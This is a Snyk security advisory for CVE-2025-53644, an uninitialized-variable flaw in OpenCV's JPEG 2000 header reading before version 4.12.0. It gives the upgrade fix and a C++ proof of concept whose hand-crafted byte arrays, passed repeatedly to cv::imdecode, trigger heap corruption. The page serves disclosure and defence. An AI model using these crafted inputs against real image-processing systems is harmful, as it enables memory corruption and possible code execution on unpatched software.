Use of Uninitialized Variable Affecting opencv/opencv package, versions [,4.12.0)
Threat Intelligence
Exploit Maturity
Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Proof of Concept
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk IDSNYK-UNMANAGED-OPENCVOPENCV-10775455
- published18 Jul 2025
- disclosed17 Jul 2025
- creditJaroslav Lobačevski
Introduced: 17 Jul 2025
NewCVE-2025-53644 (opens in a new tab)Common Vulnerabilities and Exposures (CVE) are common identifiers for publicly known security vulnerabilities
Common Weakness Enumeration (CWE) is a category system for software weaknesses
How to fix?
Upgrade opencv/opencv to version 4.12.0 or higher.
Overview
Affected versions of this package are vulnerable to Use of Uninitialized Variable via the opj_jp2_read_header component when reading crafted JPEG images. An attacker can achieve arbitrary heap buffer writes by supplying specially crafted JPEG files.
PoC
#include <opencv2/opencv.hpp>
#include <opencv2/imgcodecs/legacy/constants_c.h>
static void decode(const uint8_t* data, size_t size) {
std::vector<uint8_t> image_data = {data, data + size};
cv::Mat data_matrix =
cv::Mat(1, image_data.size(), CV_8UC1, image_data.data());
cv::Mat decoded_matrix = cv::imdecode(data_matrix, CV_LOAD_IMAGE_UNCHANGED);
}
int main() {
const uint8_t data1[] = {0xff,0x4f, // SOC marker
0xff,0x51, // SIZ marker
0x00,0x29, // Size with marker 41
0x01,0x05,// Rsiz (capabilities)
0x00,0x00,0x0a,0xa2, // Xsiz
0x00,0x01,0xeb,0xb8, // Ysiz
0x00,0x00,0x00,0x33, // XOsiz
0x00,0x00,0x41,0x80, // YOsiz
0x00,0x0b,0x00,0x03, // XTsiz
0x2a,0xb9,0xd1,0x4d, // YTsiz
0x00,0x00,0x00,0x21, // XTOsiz
0x00,0x00,0x0f,0xf5, // YTOsiz
0x00,0x01, // Csiz
0x07, // Ssiz_0
0x0a, // XRsiz_0
0x37, // YRsiz_0
0xff,0x52, // COD marker
0x00,0x0d, // Size with marker 13
0x05, // Scod
0x00, // SGcod (A)
0x00,0x11, // SGcod (B)
0x00, // SGcod (C)
0x00, // SPcod (D) / SPcoc (A)
0x04, // SPcod (E) / SPcoc (B)
0x04, // SPcod (F) / SPcoc (C)
0x2c, // SPcod (G) / SPcoc (D)
0x01, // SPcod (H) / SPcoc (E)
0x86, // SPcod (I_i) / SPcoc (F_i)
0xff,0x5c, // QCD marker
0x00,0x04, // Size with marker 4
0x60, // Sqcx
0xb7, // SPqcx_0
0xff,0x90, // SOT marker
0x00,0x0a, // Size with marker 10
0x00,0x00, // Isot
0x00,0x00,0x00,0x00, // Psot
0x00, // TPsot
0x76, // TNsot
0xff,0x93, // SOD marker
0x00,0x00 // last invalid marker
};
const uint8_t data2[] = {0x00,0x00,0x00,0x0c,0x6a,0x50,0x20,0x20,0x0d,0x0a,0x87,0x0a, // signature
0x00,0x00,0x00,0x14, // box length 20
0x66,0x74,0x79,0x70, // box: file type
0x6a,0x70,0x30,0x20, // BR
0xf9,0xff,0xff,0xff, // MinV
0x6a,0x70,0x33,0x20, // CLi
0x00,0x00,0x00,0x31, // box length 49
0x6a,0x70,0x32,0x68, // box: JP2 Header
0x00,0x00,0x00,0x16, // box length 22
0x69,0x68,0x64,0x72, // box: Image Header
0x00,0x80,0x00,0x00, // Height
0x00,0x00,0x05,0x00, // Width
0x00,0x03, // NC (number of components)
0x07, // BPC
0x07, // C
0x00, // UnkC
0x00, // IPR
0x00,0x00,0x00,0x13, // box length 19
0x63,0x6f,0x6c,0x72, // box: Color Specification
0x02, // Meth
0xff, // PRECEDENCE
0xff, // APPROX
0x01,0x02,0x03,0x04,0x05,0x06,0x07,0x08, // icc values
};
decode(data1, sizeof(data1));
decode(data2, sizeof(data2));
decode(data2, sizeof(data2));
decode(data1, sizeof(data1));
decode(data2, sizeof(data2));
return 0;
}